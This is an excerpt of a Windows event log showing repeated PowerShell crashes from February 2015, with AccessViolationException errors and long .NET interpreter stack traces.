   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:40:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c0000005039292b86e001d04e59a6e1c57dC:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknownea3b534c-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:40:24 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:38:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c000000503048ce8137801d04e5950fbbed4C:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknown94e77365-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:38:00 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:37:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c0000005035092a0f3c01d04e594b4c4144C:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknown8e33772d-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:37:50 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
